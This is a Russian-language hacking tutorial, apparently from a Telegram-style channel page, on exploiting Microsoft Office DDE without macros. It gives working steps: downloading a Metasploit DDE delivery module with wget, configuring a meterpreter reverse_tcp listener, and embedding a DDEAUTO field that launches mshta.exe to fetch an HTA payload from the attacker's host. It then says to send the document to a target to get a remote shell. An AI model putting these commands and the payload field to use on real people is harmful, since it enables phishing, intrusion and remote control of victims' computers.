Тестирование на проникновение Windows с использованием Microsoft Office DDE Exploit (MACROLESS)

Тестирование на проникновение Windows с использованием Microsoft Office DDE Exploit (MACROLESS)

Life-Hack [Жизнь-Взлом]/Хакинг

#Обучение

Эксплуатация DDE также была известна как динамический обмен данными, она позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем. 

Хакеры использовали этот метод для выполнения вредоносных скриптов для компрометации данных. 

Об этом сообщили в Microsoft от Sensepost, Etienne Stalmans и Saif El-Sherei, но это не было исправлено, так как многие приложения используют протокол DDE. 

Этот эксплойт не требует включения макро-функции. 

Предпосылки — DDE эксплойт 

  • Windows машина
  • Microsoft Office (любая версия)
  • Kali Linux 

Нам придется импортировать эксплойт Metasploit. 

Загрузите его с GitHub с помощью команды терминала: 

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb 

Переместите скрипт в местоположение Metasploit 

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Теперь введите msfconsole в терминале, который запускает инфраструктуру Metasploit, и введите reload_all для загрузки модулей.

Этот эксплойт использует функцию dde для доставки полезной нагрузки hta. Теперь введите:

use exploit/windows/dde_deliverythen set the sever host using the following command
set SRVHOST 192.168.177.141

нам нужно установить прослушатель полезной нагрузки. 

Не используйте порт 8080, поскольку порт сервера по умолчанию установлен на 8080

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit

Теперь скопируйте и вставьте код в любой текстовый документ. 

Мы использовали Office 365 Pro Plus, полностью обновленный. 

Найдите формулу, и у вас должно появиться небольшое окно с ошибкой в документе, а затем щелкните правой кнопкой мыши код переключения. 

Вставьте команду в документ в скобках. 

Сохраните документ. 

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}

Отправьте документ подозреваемому, и откроется сеанс счетчика. Посмотрите на видео:

Источник


Report Page